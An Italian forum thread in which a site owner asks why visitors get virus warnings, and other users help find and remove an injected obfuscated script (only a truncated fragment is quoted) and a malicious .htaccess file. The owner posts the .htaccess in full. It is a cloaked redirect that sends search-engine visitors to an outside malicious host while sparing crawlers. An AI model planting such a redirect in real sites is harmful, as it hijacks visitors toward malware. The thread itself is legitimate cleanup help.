Virus sul sito che non riesco a visualizzare!!!

Salve a tutti! Diversi frequentatori del mio sito www.arricugghiuti.altervista.org mi segnalano che da settimane non riescono ad accedere liberamente nella home pge e nel guestbook dello stesso sito in quanto viene loro segnalata la presenza di un virus. Il problema è che io non riesco a capire di che virus si tratti perchè entrando con mozilla firefox non mi segnala nulla mentre con internet explorer mi si blocca tutto senza però darmi alcuna segnalazione di virus. Potrei chiedervi il favore di dirmi di che virus si tratta e in che modo posso risolvere il problema? Vi ringrazio anticipatamente per la vostra disponibilità!

[puntodidomanda]

scansiona il pc perchè è probabile che anche li hai una copia del virus

[darkwolf]

In effetti c'è qualcosa nel footer della homepage:

Codice:

<script>(function(){f_ET=document;f_A=window;f_A.f_i=etc....join(f_EC(t)));f_EA=d;f_q(f_EA)})()</script>

ma non è certo un problema tecnico del tuo account... è solo un problema del sito.
Scarica un backup di file ed eventuale database.
Cerca la stringa interessata e procedi alla rimozione.
Controlla la sicurezza del tuo pc (spyware e simili) e quindi cambia la password del tuo account altervista e ricarica il sito ripulito dalla stringa.

[andreafallico]

Oltre al codice malevolo che ha scritto darkwolf, hai un altro virus nel file .htaccess(http://lab.andrea-fallico.it/htscan/...ltervista.org/), puoi postare il contenuto di tale file?

Innanzitutto grazie mille per il vostro aiuto. Ho rimosso la stringa sospetta indicatami da darkwolf ma, come giustamente ha fatto notare andreafallico, il sito effettua un redirect sospetto verso un altro sito malevolo. Siccome non sono esperto in materia e non riesco ad aprire questo file .htaccess, potresti spiegarmi come devo fare per postarti tale contenuto?

[andreafallico]

Devi andare Pannello di Controllo -> AlterSito -> Gestione File clicca sull'ingranaggio poi vai -> Avanzato e seleziona tutto il codice.

Perfetto,fatto! Eccoti il codice del file:

Codice:

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://watchingsquare.com/cgi-bin/r.cgi?p=9004&i=45b00e92&j=333&m=7a89d43af367c48eb5aa2a43f0e4ccd1&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

[andreafallico]

Puoi cancellarlo.

Cancellato. Ora dovrebbe essere tutto a posto?

Scusami se insisto...qundo vado sulla pagina http://www.arricugghiuti.altervista.org/guestbook.html compare un messaggio di Internet Explorer che continua a segnalare questo sito web come non sicuro...